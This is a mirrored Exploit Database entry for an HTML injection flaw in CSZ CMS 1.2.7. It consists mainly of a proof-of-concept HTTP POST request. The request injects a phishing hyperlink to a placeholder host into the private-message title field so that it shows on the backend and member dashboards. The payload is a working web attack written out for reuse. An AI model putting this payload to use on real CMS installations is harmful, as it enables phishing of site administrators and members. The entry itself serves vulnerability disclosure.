CSZ CMS 1.2.7 – ‘title’ HTML Injection

• Exploit Database
• 19 阅读

• 作者： Metin Yunus Kandemir
  日期： 2020-04-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48357/

• # Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
  # Exploit Author: Metin Yunus Kandemir
  # Vendor Homepage: https://www.cszcms.com/
  # Software Link: https://sourceforge.net/projects/cszcms/
  # Version: v1.2.7
  # Description:
  # Authenticated user can inject hyperlink to Backend System Dashboard and
  # Member Dashboard via message.
  
  PoC Request:
  
  POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
  Firefox/60.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 196
  Cookie: cszcookie
  Connection: close
  Upgrade-Insecure-Requests: 1
  
  csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
  click to view</a></b></h1>&message=phishing&submit=Send